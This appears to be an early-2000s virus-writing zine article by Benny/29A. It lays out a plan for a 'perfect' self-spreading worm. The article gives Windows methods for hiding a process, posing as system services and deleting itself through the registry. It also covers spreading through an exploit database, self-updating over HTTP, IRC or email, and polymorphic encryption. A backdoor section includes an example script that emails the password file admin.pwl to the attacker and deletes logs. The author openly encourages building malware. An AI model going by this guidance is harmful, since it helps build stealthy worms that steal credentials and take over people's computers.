ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Wormz in 21st century ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ by Benny/29A ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Thanx goez to ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ salo, the hacker from Slovakia for his article "DOYOULOVEME?" published in hackerz zine Prielom. it inspired me and many thoughts in this article are taken from there. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Introduction ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ still remember the ILOVEYOU worm? yeah, that famous bug that become most wide-spreaded in the world and made the biggest "damages"... the spring 2000. after the scandal one polish man Zalewski (well known from bugtraq security conferension) decided to show ppl this virus ain't anything to fear of. from bugtraq (sorry for not exact translation): "media supported by altavista "experts" showed us apocalyptic vision of damage caused by stupid m$ outlook/vbs worm called "ILOVEYOU". calculated damages were incredible - 10 bilion dollarz invested to "damage repairing", especially if you will look at the growing prize of these companies on the market, it soundz silly. stupid vbs application that can't spread itself without looser click-on-me! interaction and is limited on the only one operating system designed for desktop computerz... worm that will spread itself to ppl from your e-mail address book and in its original version destroys mp3 filez on the disk. and you call it dangerous? stop being funny..." I fully agree with him. why is the world full of stupid macroviruses and vbs wormz? 90% of all viruses has nothing new to show and they were coded by cut&paste algorithm. do you believe this is the real danger for computer world? we all would like to code some superb worm that could cause world-wide infection, that could be able to spread very fast, that could stay undetectable for very long time and enable access to infected computer for you, maybe with many more features. well, why they exist so many lame wormz working still on the same algorithm: - find some e-mail addresses - send there itself - delete something is there a future in such wormz? I dont think so... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anathomy of "perfect worm" ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ yeah, also Zalewski knew that, and knew that long time before us. he wanted to code some worm, REALLY dangerous one (and as he said, he did it). but hey, dangerous does not mean destructive. dangerous means worm with dangerous spread abilities. his worm was based on following 7 rulez: A) portability: the worm must be independent on target the target platform and must be able to work on various operating systemz, not only on unix like systemz, but also dos/win. B) invisibility: the worm must have implemented many anti-* and masking featurez for hidding itself in target system and be able to stay undetected as long time as possible. C) independency: the worm must be able to spread by itself, without need of any interaction on the user side, using database of exploits. D) learning abilities: the worm should be able to learn new exploit techniques on the fly. by release of one updated worm all other worm should be able to download newest version by special communication channel (let's call it "wormnet"). E) integrity: every worm and whole structure of wormnet should be hard to detect and modify/destroy. F) polymorphism: the worm should be totally polymorphic, with no constant part of code. G) application: the worm should be able to work by program - e.g. infect system, download instructionz, send some filez and when the mission is done, escape from the machine. Now we will discuss step by step every point. So, A) portability will be probably big problem. it will be good to code such worm in some HLL language - C will be the best solution, becoz it is supported on almost every OS. you will need to use standard run-time libraries as much as possibly. yeah, sometimez you will need to use some system-specific call, mainly at pointz B) and F). but we code viruses/wormz for fun, not for making army weapons, so I'm sure almost noone will bother with this point :) B) what can be harder to code than some silly anti-* routines, you may think. however, this is not so easy to code and not so unimportant as you think. sure, you have to implement many anti-* featurez known from virus coding, thats clear. but thats not all... imagine your worm is executed on some server and its running for seven dayz and reguraly takes CPU's time, for seven dayz. when administrator will open task manager, he will see that some strange process is running for seven dayz - and that loox suspicious for sure. my advice is: change process ID number and process name and mask the time the worm is running. under Win95/98 it is very easy - you can use RegisterServiceProcess API that can make the process invisible. under WinNT/2k the situation is harder - theres no such API and its not possible to make the application invisible in the system - hmm, only by hooking psapi.dll callz (EnumProcesses API, etc), but this is a bit harder to code. i know one better method: copy worm file to somewhere under another name (such as winlogon.exe, services.exe, crcss.exe - if you will use the name of already running SERVICE, taskmanager won't be able to terminate it!), execute it and terminate itself. by this way you will create whole new process. it's very easy and efficent! you might want to register your worm as a service application under WinNT/2k. in this case just take a look at OpenSCManagerA and CreateServiceA APIz stored in ADVAPI32.dll. for such worm, it is very important to stay undetected as long time as possible. it's better to delete the worm rather than get detected - I recommend you, if your worm will "think" that he is detected (resident AV program detected, debugger detected, task manager is opened etc..), immediatelly worm should delete itself. how? under Win95 you can delete even already opened filez by simple calling of DeleteFile(A/W) API. Under Win98/NT/2k its not possible. You can call MoveFileEx API that allows you to delete already opened program after next start of OS. But this call is not implemented under Win95/98 :( So, you have to use smarter way... the possible way is to write to registry HKLM\Software\Microsoft\Windows\\CurrentVersion\RunOnce %comspec% /C del and reboot OS. This line should delete worm in next start of OS. C) this is very important stuff. if the user is at least a bit smart, he won't open such message as "open attachment blah.exe, there is one very useful util". it is also stupid way how to spread the worm. but how to spread the worm without user interaction? do you know what is remote exploit? remote exploit is a program that uses known bugz of the system/program to execute some code on remote machine. I'm sure ya have already heard about it. Outlook Express exploits are very well known - for instance, the buffer overflow bug - if the DATE item in mail message contains more than standard count of characterz, the code placed after DATE item will be executed without any notification to user. stupid, eh? but it worx. in Windowz there are thousandz and thousandz bug, just open your inet browser and visit www.securityfocus.com - there is bugtraq, conferension about security bugz - there you can find many informations about known bugz and, that's also important, full working expoits. the idea is to create updatable database of exploits that would be used for machine attacks. not too easy, but also not too hard to code. D) how will the worm be able to learn? hmm, the "learn" word is not correct. in this case, "learn" = "be able to update itself to newer version". the worm should, in the start of execution check, if there is any newer version of worm on internet and if there is any, download it and update itself, which means run the downloaded worm and delete itself. E) but how will we update the worm? where will be the newer version placed? what will be that communication channel? how to hide it? here comes some ideaz: 1) HTTP/FTP: the easiest method. you, as the author will place the updated versions of wormz to some public internet site and from there will wormz be able to download new versions. advantages: easy to code (use WININET.DLL library), easy to update, easy to debug. everything is easy in this case. disadvantages: easy to detect, easy to clean (AVerz/police can contact provider to destroy that site or they can simply add there some fake worm (e.g. cure) and all wormz will clean themself). this method is not very good. 2) IRC/E-MAIL: similar to 2) point. worm will on the start connect to IRC/EMAIL server. you, as the author can send new version to worm by DCC (on IRC) or to some public e-mail address. advantages: easy to code, same as above. you can use well documented IRC/SMTP/POP3 protocols or MAPI. disadvantages: same as above. AVerz/police can contact ISP to destroy email address / ban your access on IRC, so the worm won't be able to update itself. or they easilly can send some fake file by DCC/SMTP... 3) your own protocol: yep, code yer own communication protocol, with cypher support (I recommend public key cyphering). How? I have some ideaz in my head, but I won't explain them here, that's yer work :) But believe me, it's not so hard to code as it loox for the first time. F) to make detection of yer worm harder, use polymorphism. Don't forget that such poly engine should encode morph .code and .data sectionz aswell. My idea is to construct poly worm this way: - worm structure must be normalized - .code section should be reserved for decryptor, in .data section should be both of code and data - no section for relocationz - polymorphic engine will know all important values, such as size of sectionz and start of sectionz. - copy worm file to temporary file - morph temporary file, store generated decryptor to .code section, encoded code and data to .data section - send that temporary somewhere (e.g. yer teacher :) and delete it so, detection based on MZ header and .idata patternz is weak :) G) imho it is silly to design wormz as one-purpose thingz - one worm for stealing passwordz, one for file transfering, etc... ask yourself why do you want to code such worm - just for spreading purposes, for spying or for anything else? You can code one worm, that will be able to do everything. My idea is: - code it as backdoor: once the computer become infected, the worm will enable you to access it. You will be able to send commandz (such as dir, sendme c:\windows\admin.pwl, delete c:\*.log, etc...) and the worm will be able to realise them. - code it as soldier: the worm will know instructionz and will be based on them. i know to wayz how to do that: a) as a parameter you will pass the URL of some script file. worm will download it and work on it. the script file may look like: send "c:\windows\admin.pwl" myworm@hotmail.com del c:\windows\*.log quit b) as a parameter you will pass the URL of some executable file. worm will download it and execute it. that file will do the rest. by using these featurez your worm can work as tool for hacking, as tool for file transfering, as whatever you want. but don't forget to guarant that the worm will accept only YOUR commands, or some childish lamer can abuse your worm. this was a brief description of featurez which should the gewd worm have. ofcoz you don't need to use such featurez as portability, it's only up to you :-) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ The "Project XTC" ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ when I finished reading the mentioned article, I decided to start to work on my new worm. I wanted the worm could work on similar rulez (described above). so I started to work on the XTC project... I worked really hardly and now, XTC is finished. it does not use all featurez I talked here about. I wanted it to be as small as possible and as useful as possible. I hope it is. for me, it's wonderful tool for hacking. but that's another story... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Final words?! ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ I believe the golden age of superb wormz will come. wormz before the 2000 year are toys. let's show the world that the toys are not the only one sorta programz we can code... the golden age will come soon... if you would like to discuss with me this theme, feel free to mail me. that's all folks! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ # Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿ @ benny_29a@privacyx.com ³ @ http://benny29a.cjb.net ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ